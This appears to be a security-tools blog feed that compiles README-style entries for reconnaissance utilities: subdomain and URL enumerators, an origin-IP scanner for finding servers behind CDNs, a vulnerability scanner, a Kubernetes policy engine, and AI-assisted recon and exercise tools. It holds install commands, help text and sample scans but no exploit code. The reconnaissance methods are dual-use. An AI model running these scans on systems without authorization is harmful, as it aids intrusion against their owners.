NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xsubfind3r/cmd/xsubfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xsubfind3r.git 
  • Build the utility

     cd xsubfind3r/cmd/xsubfind3r && \
    go build .
  • Move the xsubfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xsubfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xsubfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xsubfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xsubfind3r will work right after installation. However, BeVigil, Chaos, Fullhunt, GitHub, Intelligence X and Shodan require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xsubfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, one of which will be used.

Example config.yaml:

version: 0.3.0
sources:
    - alienvault
    - anubis
    - bevigil
    - chaos
    - commoncrawl
    - crtsh
    - fullhunt
    - github
    - hackertarget
    - intelx
    - shodan
    - urlscan
    - wayback
keys:
    bevigil:
        - awA5nvpKU3N8ygkZ
    chaos:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39asdsd54bbc1aabb208c9acfb
    fullhunt:
        - 0d9652ce-516c-4315-b589-9b241ee6dc24
    github:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
        - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
        - 2.intelx.io:00000000-0000-0000-0000-000000000000
    shodan:
        - AAAAClP1bJJSRMEYJazgwhJKrggRwKA
    urlscan:
        - d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xsubfind3r use the -h flag:

xsubfind3r -h

help message:


_ __ _ _ _____
__ _____ _ _| |__ / _(_)_ __ __| |___ / _ __
\ \/ / __| | | | '_ \| |_| | '_ \ / _` | |_ \| '__|
> <\__ \ |_| | |_) | _| | | | | (_| |___) | |
/_/\_\___/\__,_|_.__/|_| |_|_| |_|\__,_|____/|_| v0.3.0

USAGE:
xsubfind3r [OPTIONS]

INPUT:
 -d, --domain string[]             target domains
 -l, --list string                 target domains' list file path

SOURCES:
     --sources bool                list supported sources
 -u, --sources-to-use string[]     comma(,) separated sources to use
 -e, --sources-to-exclude string[] comma(,) separated sources to exclude

OPTIMIZATION:
 -t, --threads int                 number of threads (default: 50)

OUTPUT:
     --no-color bool               disable colored output
 -o, --output string               output subdomains' file path
 -O, --output-directory string     output subdomains' directory path
 -v, --verbosity string            debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
 -c, --configuration string        configuration file path (default: ~/.hueristiq/xsubfind3r/config.yaml)
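Because results go to stdout, xsubfind3r chains cleanly into other tooling. A minimal sketch (the downstream commands are illustrative, not part of xsubfind3r):

# enumerate, de-duplicate, and keep a copy for later stages
xsubfind3r -d example.com | sort -u | tee subdomains.txt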

Contribution

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



Columbus-Server - An API-first subdomain discovery service with blazingly fast subdomain enumeration and advanced features

By: Zion3R


Columbus Project is an API-first subdomain discovery service with blazingly fast subdomain enumeration and advanced features.

Columbus returned 638 subdomains of tesla.com in 0.231 sec.


Usage

By default Columbus returns only the subdomains in a JSON string array:

curl 'https://columbus.elmasy.com/lookup/github.com'

But we think of the bash lovers, so if you don't want to mess with JSON and a newline-separated list is your wish, then include the Accept: text/plain header.

DOMAIN="github.com"

curl -s -H "Accept: text/plain" "https://columbus.elmasy.com/lookup/$DOMAIN" | \
while read SUB
do
    if [[ "$SUB" == "" ]]
    then
        HOST="$DOMAIN"
    else
        HOST="${SUB}.${DOMAIN}"
    fi
    echo "$HOST"
done

For more, check the features or the API documentation.

Entries

Currently, entries are obtained from Certificate Transparency.

Command Line

Usage of columbus-server:
  -check
        Check for updates.
  -config string
        Path to the config file.
  -version
        Print version information.

-check: Checks the latest version on GitHub. Prints up-to-date and returns 0 if no update is required. Prints the latest tag (eg.: v0.9.1) and returns 1 if a new release is available. In case of error, prints the error message and returns 2.

Build

git clone https://github.com/elmasy-com/columbus-server
make build

Install

Create a new user:

adduser --system --no-create-home --disabled-login columbus-server

Create a new group:

addgroup --system columbus

Add the new user to the new group:

usermod -aG columbus columbus-server

Copy the binary to /usr/bin/columbus-server.

Make it executable:

chmod +x /usr/bin/columbus-server

Create a directory:

mkdir /etc/columbus

Copy the config file to /etc/columbus/server.conf.

Set the permission to 0600.

chmod -R 0600 /etc/columbus

Set the owner of the config file:

chown -R columbus-server:columbus /etc/columbus

Install the service file (eg.: /etc/systemd/system/columbus-server.service).

cp columbus-server.service /etc/systemd/system/
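If you don't have the service file from the repository at hand, a minimal unit along these lines should work; paths, user, and group match the steps above, but treat it as a sketch rather than the official file:

cat > /etc/systemd/system/columbus-server.service <<'EOF'
[Unit]
Description=Columbus Server
After=network.target

[Service]
User=columbus-server
Group=columbus
ExecStart=/usr/bin/columbus-server -config /etc/columbus/server.conf
Restart=on-failure

[Install]
WantedBy=multi-user.target
EOF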

Reload systemd:

systemctl daemon-reload

Start columbus:

systemctl start columbus-server

If you want Columbus to start automatically:

systemctl enable columbus-server


Chaos - Origin IP Scanning Utility Developed With ChatGPT

By: Zion3R


chaos is an 'origin' IP scanner developed by RST in collaboration with ChatGPT. It is a niche utility with an intended audience of mostly penetration testers and bug hunters.

An origin-IP is a term-of-art expression describing the final public IP destination for websites that are publicly served via 3rd parties. If you'd like to understand more about why anyone might be interested in Origin-IPs, please check out our blog post.

chaos was rapidly prototyped from idea to functional proof-of-concept in less than 24 hours using our principles of DevOps with ChatGPT.

usage: chaos.py [-h] -f FQDN -i IP [-a AGENT] [-C] [-D] [-j JITTER] [-o OUTPUT] [-p PORTS] [-P] [-r] [-s SLEEP] [-t TIMEOUT] [-T] [-v] [-x] 
_..._
.-'` `'-.
__|___________|__
\ /
`._ CHAOS _.'
`-------`
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/ \\
/_____________________\\
CHAtgpt Origin-ip Scanner
_______ _______ _______ _______ _______
|\\ /|\\ /|\\ /|\\ /|\\/|
| +---+ | +---+ | +---+ | +---+ | +---+ |
| |H | | |U | | |M | | |A | | |N | |
| |U | | |S | | |A | | |N | | |C | |
| |M | | |E | | |N | | |D | | |O | |
| |A | | |R | | |C | | | | | |L | |
| +---+ | +---+ | +---+ | +---+ | +---+ |
|/_____|\\_____|\\_____|\\_____|\\_____\\

Origin IP Scanner developed with ChatGPT
cha*os (n): complete disorder and confusion
(ver: 0.9.4)


Features

  • Threaded for performance gains
  • Real-time status updates and progress bars, nice for large scans ;)
  • Flexible user options for various scenarios & constraints
  • Dataset reduction for improved scan times
  • Easy to use CSV output

Installation

  1. Download / clone / unzip / whatever
  2. cd path/to/chaos
  3. pip3 install -U pip setuptools virtualenv
  4. virtualenv env
  5. source env/bin/activate
  6. (env) pip3 install -U -r ./requirements.txt
  7. (env) ./chaos.py -h

Options

-h, --help            show this help message and exit
-f FQDN, --fqdn FQDN  Path to FQDN file (one FQDN per line)
-i IP, --ip IP        IP address(es) for HTTP requests (comma-separated IPs, IP networks, and/or files with IP/network per line)
-a AGENT, --agent AGENT
                      User-Agent header value for requests
-C, --csv             Append CSV output to OUTPUT_FILE.csv
-D, --dns             Perform fwd/rev DNS lookups on FQDN/IP values prior to request; no impact to testing queue
-j JITTER, --jitter JITTER
                      Add a 0-N second randomized delay to the sleep value
-o OUTPUT, --output OUTPUT
                      Append console output to FILE
-p PORTS, --ports PORTS
                      Comma-separated list of TCP ports to use (default: "80,443")
-P, --no-prep         Do not pre-scan each IP/port with `GET /` using `Host: {IP:Port}` header to eliminate unresponsive hosts
-r, --randomize       Randomize(ish) the order IPs/ports are tested
-s SLEEP, --sleep SLEEP
                      Add N seconds before thread completes
-t TIMEOUT, --timeout TIMEOUT
                      Wait N seconds for an unresponsive host
-T, --test            Test-mode; don't send requests
-v, --verbose         Enable verbose output
-x, --singlethread    Single threaded execution; for 1-2 core systems; default threads=(cores-1) if cores>2

Examples

Localhost Testing

Launch python HTTP server

% python3 -u -m http.server 8001
Serving HTTP on :: port 8001 (http://[::]:8001/) ...

Launch ncat as HTTP on a port detected as SSL; use a loop because --keep-open can hang

% while true; do ncat -lvp 8443 -c 'printf "HTTP/1.0 204 Plaintext OK\n\n<html></html>\n"'; done
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Listening on [::]:8443
Ncat: Listening on 0.0.0.0:8443

Also launch ncat as SSL on a port that will default to HTTP detection

% while true; do ncat --ssl -lvp 8444 -c 'printf "HTTP/1.0 202 OK\n\n<html></html>\n"'; done    
Ncat: Version 7.94 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: 0208 1991 FA0D 65F0 608A 9DAB A793 78CB A6EC 27B8
Ncat: Listening on [::]:8444
Ncat: Listening on 0.0.0.0:8444

Prepare an FQDN file:

% cat ../test_localhost_fqdn.txt 
www.example.com
localhost.example.com
localhost.local
localhost
notreally.arealdomain

Prepare an IP file / list:

% cat ../test_localhost_ips.txt 
127.0.0.1
127.0.0.0/29
not_an_ip_addr
-6.a
=4.2
::1

Run the scan

  • Note an IPv6 network added to IPs on the CLI
  • -p to specify the ports we are listening on
  • -x for single threaded run to give our ncat servers time to restart
  • -s0.2 short sleep for our ncat servers to restart
  • -t1 to timeout after 1 second
% ./chaos.py -f ../test_localhost_fqdn.txt -i ../test_localhost_ips.txt,::1/126 -p 8001,8443,8444 -x -s0.2 -t1   
2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost.local
2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: localhost
2023-06-21 12:48:33 [WARN] Ignoring invalid FQDN value: notreally.arealdomain
2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block =4.2
2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block -6.a
2023-06-21 12:48:33 [WARN] Error: invalid IP address or CIDR block not_an_ip_addr
2023-06-21 12:48:33 [INFO] * ---- <META> ---- *
2023-06-21 12:48:33 [INFO] * Version: 0.9.4
2023-06-21 12:48:33 [INFO] * FQDN file: ../test_localhost_fqdn.txt
2023-06-21 12:48:33 [INFO] * FQDNs loaded: ['www.example.com', 'localhost.example.com']
2023-06-21 12:48:33 [INFO] * IP input value(s): ../test_localhost_ips.txt,::1/126
2023-06-21 12:48:33 [INFO] * Addresses parsed from IP inputs: 12
2023-06-21 12:48:33 [INFO] * Port(s): 8001,8443,8444
2023-06-21 12:48:33 [INFO] * Thread(s): 1
2023-06-21 12:48:33 [INFO] * Sleep value: 0.2
2023-06-21 12:48:33 [INFO] * Timeout: 1.0
2023-06-21 12:48:33 [INFO] * User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 ch4*0s/0.9.4
2023-06-21 12:48:33 [INFO] * ---- </META> ---- *
2023-06-21 12:48:33 [INFO] 36 unique address/port addresses for testing
Prep Tests: 100%|████████████████████████████████████████████████████████████| 36/36 [00:29<00:00, 1.20it/s]
2023-06-21 12:49:03 [INFO] 9 IP/ports verified, reducing test dataset from 72 entries
2023-06-21 12:49:03 [INFO] 18 pending tests remain after pre-testing
2023-06-21 12:49:03 [INFO] Queuing 18 threads
++RCVD++ (200 OK) www.example.com @ :::8001
++RCVD++ (204 Plaintext OK) www.example.com @ :::8443
++RCVD++ (202 OK) www.example.com @ :::8444
++RCVD++ (200 OK) www.example.com @ ::1:8001
++RCVD++ (204 Plaintext OK) www.example.com @ ::1:8443
++RCVD++ (202 OK) www.example.com @ ::1:8444
++RCVD++ (200 OK) www.example.com @ 127.0.0.1:8001
++RCVD++ (204 Plaintext OK) www.example.com @ 127.0.0.1:8443
++RCVD++ (202 OK) www.example.com @ 127.0.0.1:8444
++RCVD++ (200 OK) localhost.example.com @ :::8001
++RCVD++ (204 Plaintext OK) localhost.example.com @ :::8443
++RCVD++ (202 OK) localhost.example.com @ :::8444
++RCVD++ (200 OK) localhost.example.com @ ::1:8001
++RCVD++ (204 Plaintext OK) localhost.example.com @ ::1:8443
++RCVD++ (202 OK) localhost.example.com @ ::1:8444
++RCVD++ (200 OK) localhost.example.com @ 127.0.0.1:8001
++RCVD++ (204 Plaintext OK) localhost.example.com @ 127.0.0.1:8443
++RCVD++ (202 OK) localhost.example.com @ 127.0.0.1:8444
Origin Scan: 100%|████████████████████████████████████████████████████████████| 18/18 [00:06<00:00, 2.76it/s]
2023-06-21 12:49:09 [RSLT] Results from 5 FQDNs:
::1
::1:8444 => (202 / OK)
::1:8443 => (204 / Plaintext OK)
::1:8001 => (200 / OK)

127.0.0.1
127.0.0.1:8001 => (200 / OK)
127.0.0.1:8443 => (204 / Plaintext OK)
127.0.0.1:8444 => (202 / OK)

::
:::8001 => (200 / OK)
:::8443 => (204 / Plaintext OK)
:::8444 => (202 / OK)

www.example.com
:::8001 => (200 / OK)
:::8443 => (204 / Plaintext OK)
:::8444 => (202 / OK)
::1:8001 => (200 / OK)
::1:8443 => (204 / Plaintext OK)
::1:8444 => (202 / OK)
127.0.0.1:8001 => (200 / OK)
127.0.0.1:8443 => (204 / Plaintext OK)
127.0.0.1:8444 => (202 / OK)

localhost.example.com
:::8001 => (200 / OK)
:::8443 => (204 / Plaintext OK)
:::8444 => (202 / OK)
::1:8001 => (200 / OK)
::1:8443 => (204 / Plaintext OK)
::1:8444 => (202 / OK)
127.0.0.1:8001 => (200 / OK)
127.0.0.1:8443 => (204 / Plaintext OK)
127.0.0.1:8444 => (202 / OK)


rst@r57 chaos %

Test & Verbose localhost

-T runs in test mode (do everything except send requests)

-v verbose option provides additional output


Known Defects

  • HTTP/HTTPS detection is not ideal
  • Need option to adjust CSV newline delimiter
  • Need options to adjust where long strings / many lines are truncated
  • Try to figure out why we marked requests v2.x as required ;)
  • Options for very-verbose / quiet
  • Stagger thread launch when we're using sleep / jitter
  • Search for meta-refresh in 200 responses
  • Content-Location header for 201s ?
  • Improve thread name generation so we have the right number of unique names
  • Sanity check on IPv6 netmasks to prevent scans that outlive the sun?
  • TBD?

Related Links

Disclaimers

  • Copyright (C) 2023 RST
  • This software is distributed on an "AS IS" basis, without express or implied warranties of any kind
  • This software is intended for research and/or authorized testing; it is your responsibility to ensure you are authorized to use this software in any way
  • By using this software you acknowledge that you are responsible for your actions and assume all liability for any direct, indirect, or other damages


Xurlfind3R - A CLI Utility To Find A Domain's Known URLs From Curated Passive Online Sources

By: Zion3R


xurlfind3r is a command-line interface (CLI) utility to find a domain's known URLs from curated passive online sources.


Features

Installation

Install release binaries (Without Go Installed)

Visit the releases page and find the appropriate archive for your operating system and architecture. Download the archive from your browser or copy its URL and retrieve it with wget or curl:

  • ...with wget:

     wget https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz
  • ...or, with curl:

     curl -OL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz

...then, extract the binary:

tar xf xurlfind3r-<version>-linux-amd64.tar.gz

TIP: The two steps above, download and extract, can be combined into a single step with this one-liner:

curl -sL https://github.com/hueristiq/xurlfind3r/releases/download/v<version>/xurlfind3r-<version>-linux-amd64.tar.gz | tar -xzv

NOTE: On Windows systems, you should be able to double-click the zip archive to extract the xurlfind3r executable.

...move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

sudo mv xurlfind3r /usr/local/bin/

NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

Install source (With Go Installed)

Before you install from source, you need to make sure that Go is installed on your system. You can install Go by following the official instructions for your operating system. For this, we will assume that Go is already installed.

go install ...

go install -v github.com/hueristiq/xurlfind3r/cmd/xurlfind3r@latest

go build ... the development Version

  • Clone the repository

     git clone https://github.com/hueristiq/xurlfind3r.git 
  • Build the utility

     cd xurlfind3r/cmd/xurlfind3r && \
    go build .
  • Move the xurlfind3r binary to somewhere in your PATH. For example, on GNU/Linux and OS X systems:

     sudo mv xurlfind3r /usr/local/bin/

    NOTE: Windows users can follow How to: Add Tool Locations to the PATH Environment Variable in order to add xurlfind3r to their PATH.

NOTE: While the development version is a good way to take a peek at xurlfind3r's latest features before they get released, be aware that it may have bugs. Officially released versions will generally be more stable.

Post Installation

xurlfind3r will work right after installation. However, BeVigil, GitHub and Intelligence X require API keys to work; URLScan supports an API key but does not require one. The API keys are stored in the $HOME/.hueristiq/xurlfind3r/config.yaml file - created upon first run - which uses the YAML format. Multiple API keys can be specified for each of these sources, one of which will be used.

Example config.yaml:

version: 0.2.0
sources:
    - bevigil
    - commoncrawl
    - github
    - intelx
    - otx
    - urlscan
    - wayback
keys:
    bevigil:
        - awA5nvpKU3N8ygkZ
    github:
        - d23a554bbc1aabb208c9acfbd2dd41ce7fc9db39
        - asdsd54bbc1aabb208c9acfbd2dd41ce7fc9db39
    intelx:
        - 2.intelx.io:00000000-0000-0000-0000-000000000000
    urlscan:
        - d4c85d34-e425-446e-d4ab-f5a3412acbe8

Usage

To display help message for xurlfind3r use the -h flag:

xurlfind3r -h

help message:

                 _  __ _           _ _____      
__ ___ _ _ __| |/ _(_)_ __ __| |___ / _ __
\ \/ / | | | '__| | |_| | '_ \ / _` | |_ \| '__|
> <| |_| | | | | _| | | | | (_| |___) | |
/_/\_\\__,_|_| |_|_| |_|_| |_|\__,_|____/|_| v0.2.0

USAGE:
xurlfind3r [OPTIONS]

TARGET:
 -d, --domain string             (sub)domain to match URLs

SCOPE:
     --include-subdomains bool   match subdomain's URLs

SOURCES:
 -s, --sources bool              list sources
 -u, --use-sources string        sources to use (default: bevigil,commoncrawl,github,intelx,otx,urlscan,wayback)
     --skip-wayback-robots bool  with wayback, skip parsing robots.txt snapshots
     --skip-wayback-source bool  with wayback, skip parsing source code snapshots

FILTER & MATCH:
 -f, --filter string             regex to filter URLs
 -m, --match string              regex to match URLs

OUTPUT:
     --no-color bool             no color mode
 -o, --output string             output URLs file path
 -v, --verbosity string          debug, info, warning, error, fatal or silent (default: info)

CONFIGURATION:
 -c, --configuration string      configuration file path (default: ~/.hueristiq/xurlfind3r/config.yaml)

Examples

Basic

xurlfind3r -d hackerone.com --include-subdomains

Filter Regex

# filter images
xurlfind3r -d hackerone.com --include-subdomains -f '^https?://[^/]*?/.*\.(jpg|jpeg|png|gif|bmp)(\?[^\s]*)?$'

Match Regex

# match js URLs
xurlfind3r -d hackerone.com --include-subdomains -m '^https?://[^/]*?/.*\.js(\?[^\s]*)?$'
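A combined sketch that saves results and then narrows them down for testing (flags as documented above; the grep step is just illustrative triage):

# collect URLs including subdomains, then keep only parameterized ones
xurlfind3r -d example.com --include-subdomains -o urls.txt
grep -F '?' urls.txt > urls-with-params.txt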

Contributing

Issues and Pull Requests are welcome! Check out the contribution guidelines.

Licensing

This utility is distributed under the MIT license.



AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

By: Zion3R


AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform individual tasks that help an exercise planner (EP) create a timely and targeted Cybersecurity Exercise Scenario, regardless of their experience.


Problems an Exercise Planner faces:

  • Constant table-top research to have fresh content
  • Realistic CSE scenario creation can be difficult and time-consuming
  • Meeting objectives but also keeping it appealing for the target audience
  • Are the relevance and timeliness aspects considered?
  • Can all the above be automated?

Our Main Objective: Build an AI-powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

Release Roadmap

The updated project, AiCEF v2.0, is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functionality will start being released by early June 2023. Thank you for your patience.

Installation

The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you to deploy MySQL manually in a dedicated environment and then start the other components using Docker.

First, make sure you have docker-compose installed in your environment:


Linux:

$ sudo apt-get install docker-compose

Then, clone the repository:

$ git clone https://github.com/grazvan/AiCEF/docker.git /<choose-a-path>/AiCEF-docker
$ cd /<choose-a-path>/AiCEF-docker

Configure the environment settings

Import the MySQL database file into your database:

$ mysql -u <your_username> --password=<your_password> AiCEF_db < AiCEF_db.sql

Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it according to your needs.

$ cp .env.sample .env

Run AiCEF

Note: Make sure you have an OpenAI API key available. Load the environment settings (including your MySQL connection details):

set -a ; source .env

Finally, run docker-compose in detached (-d) mode:

$ sudo docker-compose up -d

Usage

A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using the MLTP module, and storing them in a knowledge database called KDB. Incidents are then generated using the IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology, where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories, which can be augmented using the APT Enhancer with the activity of known APT groups from MITRE, or manually.
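Conceptually, the final graph-to-text step boils down to serializing the (possibly enhanced) incident graph and asking a text-synthesis model to narrate it. A minimal sketch, assuming the legacy OpenAI completion API and a hypothetical helper (AiCEF's actual implementation differs):

import openai  # assumption: the legacy completion API

def graph_to_scenario(graph_summary: str) -> str:
    # Hypothetical helper: turn a serialized incident graph into exercise prose.
    prompt = (
        "Write a cybersecurity exercise scenario narrating these events in order:\n"
        + graph_summary
    )
    completion = openai.Completion.create(
        engine="text-davinci-003",  # assumption: any text-synthesis model (ex. GPT-3.5)
        prompt=prompt,
        max_tokens=512,
    )
    return completion.choices[0].text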

Find below some sample usage screenshots:

Features

  • An AI-powered Cyber Exercise Generation Framework
  • Developed in Python & EEL
  • Open source library Stixview
  • Stores data in MySQL
  • API to Text Synthesis Models (ex. GPT-3.5)
  • Can create incidents based on TTPs of 125 known APT actors
  • Models Cyber Exercise Content in machine-readable STIX2.1 [2] (.json) and human-readable format (.pdf)

Authors

AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.

References

[1] https://link.springer.com/article/10.1007/s10207-023-00693-z

[2] https://oasis-open.github.io/cti-documentation/stix/intro.html

Contributing

Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

  1. Fork this repository
  2. Create a new branch (git checkout -b feature/your-branch-name)
  3. Make your changes and commit them (git commit -m 'Add some feature')
  4. Push to the branch (git push origin feature/your-branch-name)
  5. Open a new pull request

License

AiCEF is licensed under the Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See the license text for more information.

Under the following terms:

  • Attribution: You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
  • NonCommercial: You may not use the material for commercial purposes.
  • No additional restrictions: You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.



Polaris - Validation Of Best Practices In Your Kubernetes Clusters

By: Zion3R

Polaris is an open source policy engine for Kubernetes

Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.
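To make the custom-policy idea concrete, below is a small sketch of a customChecks entry that warns when a container omits resource limits. The field layout follows Polaris's custom-check configuration; the check name, messages, and severity are illustrative:

checks:
  resourceLimitsSet: warning

customChecks:
  resourceLimitsSet:
    successMessage: Resource limits are set
    failureMessage: Resource limits should be set
    category: Resources
    target: Container
    schema:
      '$schema': http://json-schema.org/draft-07/schema
      type: object
      required:
        - resources
      properties:
        resources:
          type: object
          required:
            - limits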

Polaris can be run in three different modes:

  • As a dashboard - Validate Kubernetes resources against policy-as-code.
  • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
  • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.


Documentation

Check out the documentation at docs.fairwinds.com

Join the Fairwinds Open Source Community

The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

Other Projects from Fairwinds

Enjoying Polaris? Check out some of our other projects:

  • Goldilocks - Right-size your Kubernetes Deployments by comparing your memory and CPU settings against actual usage
  • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
  • Nova - Check to see if any of your Helm charts have updates available
  • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

Or check out the full list

Fairwinds Insights

If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.



Artemis - A Modular Web Reconnaissance Tool And Vulnerability Scanner

By: Zion3R


A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).

The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.

Artemis is experimental software, under active development - use at your own risk.

Features

For an up-to-date list of features, please refer to the documentation.

Development

Tests

To run the tests, use:

./scripts/test

Code formatting

Artemis uses pre-commit to run linters and format the code. pre-commit is executed on CI to verify that the code is formatted properly.

To run it locally, use:

pre-commit run --all-files

To setup pre-commit so that it runs before each commit, use:

pre-commit install

Building the docs

To build the documentation, use:

cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html

How do I write my own module?

Please refer to the documentation.
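For a rough feel of what a module involves, here is a minimal sketch of a bare Karton consumer using the generic karton.core API. It is not Artemis's actual module base class, and the identity, filter, and payload key below are hypothetical:

from karton.core import Karton, Task

class ExampleScanner(Karton):
    # Hypothetical module: consumes tasks of one type and logs a result.
    identity = "example-scanner"        # hypothetical queue identity
    filters = [{"type": "new-domain"}]  # hypothetical task filter

    def process(self, task: Task) -> None:
        domain = task.get_payload("domain")  # hypothetical payload key
        self.log.info("scanning %s", domain)
        # ...perform the check, then optionally emit follow-up tasks...

if __name__ == "__main__":
    ExampleScanner().loop()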

Contributing

Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.

However obvious it may seem, we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.



ReconAIzer - A Burp Suite Extension To Add OpenAI (GPT) On Burp And Help You With Your Bug Bounty Recon To Discover Endpoints, Params, URLs, Subdomains And More!

By: Zion3R


ReconAIzer is a powerful Jython extension for Burp Suite that leverages OpenAI to help bug bounty hunters optimize their recon process. This extension automates various tasks, making it easier and faster for security researchers to identify and exploit vulnerabilities.

Once installed, ReconAIzer adds a contextual menu and a dedicated tab to see the results:


Prerequisites

  • Burp Suite
  • Jython Standalone Jar

Installation

Follow these steps to install the ReconAIzer extension on Burp Suite:

Step 1: Download Jython

  1. Download the latest Jython Standalone Jar from the official website: https://www.jython.org/download
  2. Save the Jython Standalone Jar file in a convenient location on your computer.

Step 2: Configure Jython in Burp Suite

  1. Open Burp Suite.
  2. Go to the "Extensions" tab.
  3. Click on the "Extensions settings" sub-tab.
  4. Under "Python Environment," click on the "Select file..." button next to "Location of the Jython standalone JAR file."
  5. Browse to the location where you saved the Jython Standalone Jar file in Step 1 and select it.
  6. Wait for the "Python Environment" status to change to "Jython (version x.x.x) successfully loaded," where x.x.x represents the Jython version.

Step 3: Download and Install ReconAIzer

  1. Download the latest release of ReconAIzer
  2. Open Burp Suite
  3. Go back to the "Extensions" tab in Burp Suite.
  4. Click the "Add" button.
  5. In the "Add extension" dialog, select "Python" as the "Extension type."
  6. Click on the "Select file..." button next to "Extension file" and browse to the location where you saved the ReconAIzer.py file in Step 3.1. Select the file and click "Open."
  7. Make sure the "Load" checkbox is selected and click the "Next" button.
  8. Wait for the extension to be loaded. You should see a message in the "Output" section stating that the ReconAIzer extension has been successfully loaded.

Congratulations! You have successfully installed the ReconAIzer extension in Burp Suite. You can now start using it to enhance your bug bounty hunting experience.

Once that's done, you must configure your OpenAI API key on the "Config" tab under the "ReconAIzer" tab.
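Under the hood, a Jython extension like this is simply a Python class loaded through Burp's legacy Extender API. A minimal skeleton, for orientation only (not ReconAIzer's actual source; the extension name is illustrative):

from burp import IBurpExtender

class BurpExtender(IBurpExtender):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("Recon helper (skeleton)")  # illustrative name
        # From here an extension registers its context menu, tab, etc.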

Feel free to suggest prompt improvements or anything you would like to see in ReconAIzer!

Happy bug hunting!



